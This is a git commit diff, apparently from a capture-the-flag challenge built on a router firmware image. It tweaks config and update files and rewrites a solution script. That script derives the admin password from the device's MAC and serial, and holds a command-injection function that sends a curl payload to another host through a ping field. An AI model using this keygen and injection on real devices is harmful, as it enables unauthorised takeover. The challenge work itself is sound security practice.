DNS is useless; fix tar path in update.sh

2020-09-23 11:13:38 +02:00 · 2020-09-23 11:13:38 +02:00 · 919a275fe3
commit 919a275fe3
parent 8b7aa17303
4 changed files with 44 additions and 43 deletions
--- a/buildroot/board/tiesse/tgr/permissions.config
+++ b/buildroot/board/tiesse/tgr/permissions.config
@ -4,4 +4,4 @@
 /update.sh f 755 root root - - - - -
 /root/ d 700 root root - - - - - 
 /root/.ssh/ d 700 root root - - - - -
-/root/.ssh/authorized_keys 644 root root - - - - -
+/root/.ssh/authorized_keys f 644 root root - - - - -
--- a/conf/etc/dhcp/dhcpd.conf
+++ b/conf/etc/dhcp/dhcpd.conf
@ -1,6 +1,6 @@
 default-lease-time 600;
 max-lease-time 14400;
-option domain-name-servers 1.1.1.1; 
+#option domain-name-servers 1.1.1.1; 
 option subnet-mask 255.255.255.0;
 option broadcast-address 192.168.77.255;

--- a/solution/solution.py
+++ b/solution/solution.py
@ -1,40 +1,41 @@
-import requests
-import hashlib
-
-def xorshift(x, y, z, w):
-    t = x
-    t = t ^ ((t << 11) & 0xFFFFFFFF)
-    t = t ^ (t >> 8)
-    x, y, z = y, z, w
-    w = (w ^ (w >> 19)) ^ t
-    return x, y, z, w, t
-
-def keygen(mac, serial):
-	l = 20
-	password = ""
-	md5a = hashlib.md5(mac).hexdigest()
-	md5b = hashlib.md5(serial).hexdigest()
-	w = int(md5a[0:8], 16)
-	x = int(md5a[8:16], 16)
-	y = int(md5a[16:24], 16)
-	z = int(md5a[24:32], 16)
-
-	for i in range(0, l):
-		x, y, z, w, t = xorshift(x, y, z, w)
-		password += md5b[t % 20]
-
-	return password
-
-def rce(username, password, host, payload):
-	requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
-
-def main():
-	serial = "D7F2959E8EE66CC06CB67C0D2B835273".encode("ascii")
-	mac = "ac:35:ee:ad:29:1b".encode("ascii")
-	host = "192.168.77.1"
-	payload = "curl 192.168.1.2:8080"
-	password = keygen(mac, serial)
-	print(password)
-	#rce("admin", password, host, payload)
-	
-main()
+import requests
+import hashlib
+import sys
+
+def xorshift(x, y, z, w):
+    t = x
+    t = t ^ ((t << 11) & 0xFFFFFFFF)
+    t = t ^ (t >> 8)
+    x, y, z = y, z, w
+    w = (w ^ (w >> 19)) ^ t
+    return x, y, z, w, t
+
+def keygen(mac, serial):
+	l = 20
+	password = ""
+	md5a = hashlib.md5(mac).hexdigest()
+	md5b = hashlib.md5(serial).hexdigest()
+	w = int(md5a[0:8], 16)
+	x = int(md5a[8:16], 16)
+	y = int(md5a[16:24], 16)
+	z = int(md5a[24:32], 16)
+
+	for i in range(0, l):
+		x, y, z, w, t = xorshift(x, y, z, w)
+		password += md5b[t % 20]
+
+	return password
+
+def rce(username, password, host, payload):
+	requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
+
+def main():
+	serial = sys.argv[1].encode("ascii")
+	mac = sys.argv[2].encode("ascii")
+	host = "192.168.77.1"
+	payload = "curl 192.168.77.10:8080"
+	password = keygen(mac, serial)
+	print(password)
+	#rce("admin", password, host, payload)
+	
+main()
--- a/update/update.sh
+++ b/update/update.sh
@ -32,7 +32,7 @@ if [ "$check" == "Verified OK" ]
 then
        /bin/echo "[+] Signature is valid!"
        /bin/echo "[+] Upgrading..."
-        /usr/bin/tar -xvzf /tmp/update.tgz.cc -C /
+        /bin/tar -xvzf /tmp/update.tgz.cc -C /
        /bin/rm /tmp/update.tgz.cc /tmp/sig
        /bin/echo "[+] Done"
        exit 0